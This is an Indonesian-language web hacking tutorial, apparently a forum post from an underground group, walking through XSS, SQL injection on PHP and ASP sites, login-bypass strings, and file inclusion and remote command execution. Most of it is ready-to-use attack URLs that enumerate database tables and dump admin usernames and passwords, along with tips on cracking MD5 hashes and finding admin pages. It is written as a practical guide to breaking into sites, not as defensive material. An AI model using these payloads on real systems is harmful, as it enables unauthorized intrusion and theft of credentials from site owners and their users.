nah loh apa itu??? itu adalah XSS (cross site scripting), wah kenapa namanya bukan jadi CSS???, wah pinter nih , gini loh karena CSS sendiri sudah memiliki arti yakni Cascading style sheet, nah nanti kalo pk singkatan itu jadi rancu donk,hehehe, yah pokoknya begitulah dari yang w pernah tahu n baca,kalo ada yang mau cari lagi silahkan jah kenapa namanya demikia, kalo w sih males, lebih baik langsung ngerti, xii,xii...
XSS adalah satu teknik web attack yang sangat mudah sekali dilakukan, ibaratnya, bug ini adalah sederhana karena attacker hanya menampilkan script yang tertulis di URL addressnya, wah gimana tuh...???? ok, langsung praktek saja
example:
http://namasite.com/aduh.php?xss=welcome+to+mysite
nah dari situ biasanya kita tahu baha web tesebut terkena vulnerable XSS, dari situ kita bisa memainkan URL tersebut menjadi:
example:
http://namasite.com/aduh.php?xss=alert(kamu ganteng deh)
nah nanti bisa kita rubah seperti itu,nanti setelah kita tekan enter maka akan keluar javascript alert dengan tulisan "kamu ganteng deh",hehehe
0x02::SQL injection
nah ini mungkin udeh pada tahu, atau mungkin udeh banyak yang mngerti metode ini, kalo udeh ada silahkan saja yah dilewadkan,, ini juga serangan attacker yang sering kali digunakan, karena masih banyak sekali site yang vulnerable dengan metode ini, sebelum lebih jauh membahas metode yang satu ini, g ada salahnya kita berkenalan dengan metode ini, karena ada pepatah, ga kenal maka g tahu(jayus loh..gpp yang penting metal..:p).
gini loh, sql injection adalah metode web attack dengan melakukan pemberian karakter2 khusus diURL target, jihaha, apalagi itu, saya g ngerti @#$%!@#...wets, sabar donk om, ini mau dikasih contoh, gini loh om, biasanya web tersebut di URLnya diberikan tanda quote,
example:
http://serang.org.sql.php?inject=20'
nah kan diberikan tanda petik tuh, kalo ada pesan error, berarti web tersebut vulnerable dengan sql injection
kemudian kita bisa mencari kolom keberapa yang mengalami masalah
example:
http://serang.org/sql.php?injection=10 order by 1--
example:
http://serang.org/sql.php?injection=10 order by 5--
atau juga bisa mencari dengan metode lain:
example:
http://serang.org/sql.php?injection=-10 union all select 1--
example:
http://serang.org/sql.php?injection=-10 union all select 1,2--
example:
http://serang.org/sql.php?injection=-10 union all select 1,2,3--
dan seterusnya
atau juga bisa
example:
http://serang.org/sql.php?injection=10 and 1=2 union all select 1--
example:
http://serang.org/sql.php?injection=10 and 1=2 union all select 1,2--
example:
http://serang.org/sql.php?injection=10 and 1=2 union all select 1,2,3--
dan seterusnya sampe keluar kolom yang bermasalahnya ok...
nah kalo gitu, karena ini cuma contoh,kita anggap yang keluar adalah kolom ke 3
setelah itu kita bisa mengecek versi sqlnya
example:
http://serang.org/sql.php?injection=-10 union all select 1,2,version(),4,5--
atau
example:
http://serang.org/sql.php?injection=-10 union all select 1,2,@@version,4,5--
kalo seandainya yang keluar versi 4.x.x, maka lewadkan saja, kalo mau dipaksa bisa sih, tapi harus tebak2 tabel dan kolom,hehehe, kalo seandainya yang keluar versi 5.x.x , mari lanjutkan.
untuk mencari tabel yang terdapat dalam site tersebut
example:
http://serang.org/sql.php?injection=-10 union all select 1,2,group_concat(table_name),4,5 from information_schema.tables where table_schema=databasae()--
inget file yang penting adalah:
>>group_concat(table_name)<< == untuk mencari table dari database yang ada.
>>from information_schema.tables where table_schema=database << == diletakan di angka terakhir yang kita dapatkan (lihad contoh diatas)
ok, sekarang kita dapet tabelnya nih, misalnya isi tabelnya sebagai berikut:
admin
user
forum
berita
polling
nah stelah dapet itu selanjutnya kita harus tahu, apa saja sih yang ada didalam tabel itu, tapi tabel yang ingin dicari harus terlebih dahulu kita konvert ke ASCII
example:
http://serang.org/sql.php?injection=-10 union all select 1,2,group_concat(column_name),4,5 from information_schema.columns where table_name=0x61646D696E--
61646D696E = admin = dari string kita rubah ke ASCII dengan menambahkan 0xASCII
setelah kita dapet kolomnya, sekarang saatnya kita dump itu kolom, misalkan kolom yang terdapat pada tabel adalah:
id
username
password
nah kan udeh tahu kan, dumping deh
example:
http://serang.org/sql.php?injection=-10 union all select group_concat(id,0x3a,username,0x3a,password,0x3a,email) from admin--
nah selesai deh, username n password ada ditangan anda, kalo seandainya password yang kita dapet di encrypt dengan md5 silahkan crack saja yah, banyak ko crackan buat md5 yang online tool sekarang..kalo saya sih lebih suka pake toolnya si gunslinger yang md5 cracking, enak tuh...sering dapet..sekalian w promosiin gunslinger tool loh, ok, setelah berhasil di crack atau dapet password dan usernamenya, silahkan cari halaman adminnya, kalo males, pk tool adminpagefinder dari gunslinger juga, sayang toolnya lum bisa update pagenya...hehe, tr kapan2 kita renov ya gunslinger.
0x03::SQL injection for ASP
sebernernya ini sama saja dengan metode SQL injection yang diatas, tapi bedanya hanya dibahasa yang digunakan, kalo yang diatas biasa di pk untuk *.php dan kalo yang ini untuk *.asp..
example:
http://inject.web.id/sql.asp?injection=12'
kalo muncul pesan error kaya gini "Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark before the character string ''.
/news.asp, line 52" berarti bisa kita lanjutkan, selain dari itu, coba2 ajah ok...hehehehe :p
lanjutkan dengan
example:
http://inject.web.id/sql.asp?injection=12' HAVING 1=1--
error "Microsoft OLE DB Provider for SQL Server error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Column 'news.news_id' is invalid in the select list because it is not contained in an aggreate function and there is no GROUP BY clause."
cari lagi table dan kolomnya
example:
http://inject.web.id/sql.asp?injection=12' GROUP BY news.news_id HAVING 1=1--
error "Microsoft OLE DB Provider for SQL Server error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Column 'news.news_detail' is invalid in the select list because it is not contained in an aggreate function and there is no GROUP BY clause."
Error menunjukkan nama column yang ketiga adalah "news_detail"
Untuk mencari nama column yang seterusnya, lakukan seperti langkah selanjutnya dengan menambahkan urutan nama-nama column.
Jika pada akhirnya tidak muncul error, berarti sudah tidak ada lagi column yang di dalam table.
Selanjutnya kita akan menggunakan metode yang lain untuk memanfaatkan error MSSQL dengan command "convert".
Contoh command yang akan ditambahkan diakhir URL (setelah parameter id) adalah: +and+1=convert(int,perintah)--
contoh kita akan melihat versi server:
example:
http://inject.web.id/sql.asp?injection=1+and+1=convert(int,@@version)--
Pesan error yang muncul:
Microsoft SQL Native Client error '80040e07'
Conversion failed when converting the nvarchar value 'Microsoft SQL Server 2005 - 9.00.3042.00 (Intel X86) Feb 9 2007 22:47:07 Copyright (c) 1988-2005 Microsoft Corporation Express Edition on Windows NT 5.2 (Build 3790: Service Pack 1) ' to data type int.
/page.asp, line 9
Dari error tersebut kita mengetahui versi Microsoft SQL dan OS-nya.
Untuk mencari nama databasenya
example:
http://inject.web.id/sql.asp?injection=1+and+1=convert(int,db_name())--
Error yang dihasilkan:
Microsoft SQL Native Client error '80040e07' Conversion failed when converting the nvarchar value 'cwhdb' to data type int.
/page.asp, line 9
Berdasarkan error maka dapat diketahui bahwa nama database adalah "cwhdb"
Untuk melihat user yang sementara menggunakan database gunakan command user_name(). contoh:
example:
http://inject.web.id/sql.asp?injection=1+and+1=convert(int,user_name())--
Error yang dihasilkan:
Microsoft SQL Native Client error '80040e07' Conversion failed when converting the nvarchar value 'sa' to data type int.
/showthread.asp, line 9
Error menunjukkan bahwa user adalah "sa"
Sekarang adalah bagaimana mencari nama table, nama column, dan isinya, dari table information_schema. Perintahnya: +and+1=convert(int,(select+top+1+table_name+from+information_schema.tables))-- >>contoh:
example:
http://inject.web.id/sql.asp?injection=1+and+1=convert(int,(select+top+1+table_name+from+information_schema.tables))--
Error yang dihasilkan:
Microsoft SQL Native Client error '80040e07' Conversion failed when converting the nvarchar value 'threads' to data type int.
/page.asp, line 9
Dari query tersebut, dapat diketahui bahwa "threads" sebagai tipe data nvarchar dan tidak bisa diconvert ke data tipe int, maka menghasilkan error.
Dan dengan error tersebut, menunjukkan table yang pertama adalah table "threads".
Selanjutnya mencari table yang kedua. Dengan menambahkan perintah WHERE. contoh:
example:
http://inject.web.id/sql.asp?injection=1+and+1=convert(int,(select+top+1+table_name+from+information_schema.tables+where+table_name+not+in+('threads')))--
/*Penjelasan perintah tersebut, yaitu kita akan mengambil informasi dari table information_schema dimana/dengan nama table tidak/bukan "threads". Atau dengan kata lain kita akan mencari table yang selain table "threads"*/
Maka akan muncul error:
Microsoft SQL Native Client error '80040e07' Conversion failed when converting the nvarchar value 'users' to data type int.
/page.asp, line 9
Error menunjukkan table yang kedua adalah "users". Untuk mencari table yang lain, hanya tambahkan nama table yang telah diketahui. contoh:
example:
http://inject.web.id/sql.asp?injection=1+and+1=convert(int,(select+top+1+table_name+from+information_schema.tables+where+table_name+not+in+('threads','users')))--
Error yang muncul:
Microsoft SQL Native Client error '80040e07' Conversion failed when converting the nvarchar value 'forums' to data type int.
/page.asp, line 9
Yang berarti nama table yang ketiga adalah table "forums"
Namun jika error yang tampil seperti ini:
ADODB.Field error '800a0bcd' Either BOF or EOF is True, or the current record has been deleted. Requested operation requires a current record.
/page.asp, line 10
Maka menandakan bahwa semua table telah ditampilkan dan sudah tidak ada lagi table yang lain.
Selanjutnya mencari nama column dari table. Metodenya hampir sama dengan yang sebelumnya, yaitu masih mencari dari "information_schema" namun perintahnya dari "information_schema.tables" berubah menjadi "information_schema.columns" dan dari "table_name" berubah menjadi "column_name". contoh:
example:
http://inject.web.id/sql.asp?injection=1+and+1=convert(int,(select+top+1+column_name+from+information_schema.columns+where+table_name='users'))--
Menampilkan error:
Microsoft SQL Native Client error '80040e07' Conversion failed when converting the nvarchar value 'uname' to data type int.
/showthread.asp, line 9
Dan berdasarkan error diketahui isi column pertama dari table "users" adalah column "uname".
Untuk mencari column yang lain gunakan perintah di akhir URL: and+column_name+not+in+('uname'). contoh:
example:
http://inject.web.id/sql.asp?injection=1+and+1=convert(int,(select+top+1+column_name+from+information_schema.columns+where+table_name='users'+and+column_name+not+in+('uname')))--
Menghasilkan error:
Microsoft SQL Native Client error '80040e07' Conversion failed when converting the nvarchar value 'upass' to data type int.
/showthread.asp, line 9
Berdasarkan error, column yang kedua adalah column "upass" yang terdapat dari table "user".
Untuk mencari column yang lain, tambahkan nama column yang telah kita ketahui sebelumnya. contoh:
example:
http://inject.web.id/sql.asp?injection=1+and+1=convert(int,(select+top+1+column_name+from+information_schema.columns+where+table_name='users'+and+column_name+not+in+('uname','upass')))--
Muncul error:
Microsoft SQL Native Client error '80040e07' Conversion failed when converting the nvarchar value 'email' to data type int.
/showthread.asp, line 9
Berarti column yang ketiga adalah column "email".
Tetapi jika error yang dihasilkan adalah:
ADODB.Field error '800a0bcd' Either BOF or EOF is True, or the current record has been deleted. Requested operation requires a current record.
/page.asp, line 10
Itu menandakan bahwa sudah tidak ada lagi column yang lain.
Last step, adalah mencari isi dari column yang telah kita ketahui. Seperti ini:
example:
http://inject.web.id/sql.asp?injection=1+and+1=convert(int,(select+top+1+uname+from+users))--
Error yang muncul:
Microsoft SQL Native Client error '80040e07' Conversion failed when converting the nvarchar value 'admin' to data type int.
/page.asp, line 9
Berarti isi dari column "uname" yang berada di table "users" datanya adalah "admin".
Untuk mencari user yang lain, gunakan data yang telah kita ketahui. contoh:
example:
http://www.example.com/page.asp?id=1+and+1=convert(int,(select+top+1+uname+from+users+where+uname+not+in+('admin')))--
Jika error yang muncul:
Microsoft SQL Native Client error '80040e07' Conversion failed when converting the nvarchar value 'cwh' to data type int.
/page.asp, line 9
Berarti username yang lain adalah "cwh". Dan untuk mencari user yang berikutnya, tambahkan username yang telah diketahui. contoh:
example:
http://inject.web.id/sql.asp?injection=1+and+1=convert(int,(select+top+1+uname+from+users+where+uname+not+in+('admin','cwh')))--
Dan jika errornya:
ADODB.Field error '800a0bcd' Either BOF or EOF is True, or the current record has been deleted. Requested operation requires a current record.
/showthread.asp, line 10
Berarti hanya ada 2 user yaitu "admin" dan "cwh".
Dan untuk mencari passwordnya, perintahnya seperti:
example:
http://inject.web.id/sql.asp?injection=1+and+1=convert(int,(select+top+1+upass+from+users))--
Dan jika error yang ditampilkan adalah:
Microsoft SQL Native Client error '80040e07' Conversion failed when converting the nvarchar value '123' to data type int.
/page.asp, line 9
Maka isi dari data yang pertama di column "upass" adalah "123".
Dari hasil yang kita dapat diatas, isi data pertama dari column "uname" adalah "admin", dan isi data pertama dari column "upass" adalah "123".
Berarti usernamenya adalah "admin" dan passwordnya "123"
0x04::bypass Login
emh apa yah...sebenernya sih pengertian ini w buat berdasarkan pengalaman w yah, masalahnya w mau cari referensi yang agak enak w pahamain pada sulit2..:p...akhirnya jad lah kesimpulan bypass menurut w...bypass adalah teknik hacking untuk login ke suatu site dengan memanfaatkan kesalahan dari si programmer di form login...
begitu kira2 menurut w brother...
ini sedikit list yang biasa di gunakan untuk bypass halaman website:
'or'
1'or'1'='1
having 1=1--
x'or'x'='x
dan masih banyak lagi silahkan anda kembangkan dan cari lagi, seperti biasa, in google..hehehe
0x05::File Inclusion
hello bro..ini dia kita memasuki tahap yang dibilang banyak dilakukan oleh para hacker indonesia yang sering main atau nongkrong di irc,hehehe :p
file inclusion ini terbagi 2 bagian:
1.Remote FIle Inclusion
2.Local File Inclusion
nah sini w bahas yang RFI dulu yah..
RFI (Remote File Inclusion) adalah sebuah lubang dimana site mengizinkan attacker meng-include-kan file dari luar server. nah ngerti g tuh bro...jadi gampangnya gini loh...jadi dari luar server kita bisa melakukan kaya kita didalam server, nah gitu bro...
nah kemudian LFI
LFI (Local File Inclusion) adalah sebuah lubang pada site di mana attacker bisa mengakses semua file di dalam server dengan hanya melalui URL.
nah disni saya akan memberikan bug terjadinya RFI dan LFI..
> [Penjelasan ]
< fungsi-fungsi yang dapat menyebabkan LFI/RFI:include(); include_once(); require(); require_once(); Dengan syarat pada konfigurasi php di server: allow_url_include = on allow_url_fopen = on magic_quotes_gpc = off contoh: misalkan kita punya file index.php dengan content kodenya seperti ini, Code: include "../$_GET[framefile]"; ?>
0x06::RCE (Remote Command Execution)
RCE...wah apa tuh baru denger nih...???? wah kaka, masa sih baru denger..ini adalah salah satu serang yang sering digunakan oleh attacker di indonesia juga..dari namanya juga kita pasti tahu apakah itu..itu adalaha bagaiman si attacker mampu menexecute perintah2 dengan meremote server yang vulnerable dari site
sebagai contoh saya bisa kasih link saja yah tentang RCE ini
untuk mencari RCE anda bisa buka
http://www.milw0rm.com/papers/369
untuk bermain RCE dengan LFI, loh bisa baca
http://www.milw0rm.com/papers/361
http://www.milw0rm.com/papers/260
nah sisanya anda cari lagi yang mengenai RCE, sebenernya RCE bukan hanya ada di bug LFI, tapi masih banyak lagi, seperti di phpmyadmin dan lain-lain..
sekian dari saya semoga bermanfaat adanya bro...
greetz:mywisdom,gunslinger_,flyff666,petimati, gonzhack,rotlez,xtronic,spykit33,devil_nongkrong,7460(newbie_mantap),d4y4x ( thanks udeh mau dengerin curhatan w bro) n all Devilzc0de member n crew, yogyacarderlink n all member, hacker newbie n all member n all underground community
referensi:google, baca ebook, tanya2 sama temen, otak gue yang kadang gilanya kumat..

